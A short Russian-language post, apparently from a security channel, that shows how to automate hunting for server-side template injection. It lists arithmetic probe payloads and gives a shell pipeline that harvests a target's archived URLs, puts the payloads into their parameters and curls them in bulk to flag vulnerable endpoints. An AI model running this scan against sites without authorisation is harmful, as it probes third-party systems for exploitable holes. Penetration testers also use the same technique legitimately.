​​🔗 Автоматизируем поиск Server-side Template Injection (SSTI)



Для начала, сохрани эти полезные нагрузки в файл payloads.txt (можешь добавить свои):



check-ssti{{7*7}}[[1*1]]

check-ssti{{7*7}}

check-ssti{{7*'7'}}

check-ssti<%= 7 * 7 %>

check-ssti${7*7}

check-ssti${{7*7}}

check-ssti@(7*7)

check-ssti#{7*7}

check-ssti#{ 7 * 7 }



Затем, с помощью waybackurls получаем конечные точки нашего сайта и выбираем наиболее подходящие для SSTI с помощью gf:



echo target.com | waybackurls | gf ssti | anew -q ssti.txt



Создаём список конечных точек с полезной нагрузкой в качестве параметра:



cat payloads.txt | while read -r line; do cat ssti.txt | qsreplace "$line" | anew -q sstipatterns.txt; done



Запускаем команду для проверки ответа сервера на наличие SSTI:



cat sstipatterns.txt | xargs -P 50 -I@ bash -c "curl -s -L @ | grep \"check-ssti49\" && echo -e \"[VULNERABLE] - @ \n \"" | grep "VULNERABLE"



#web #ssti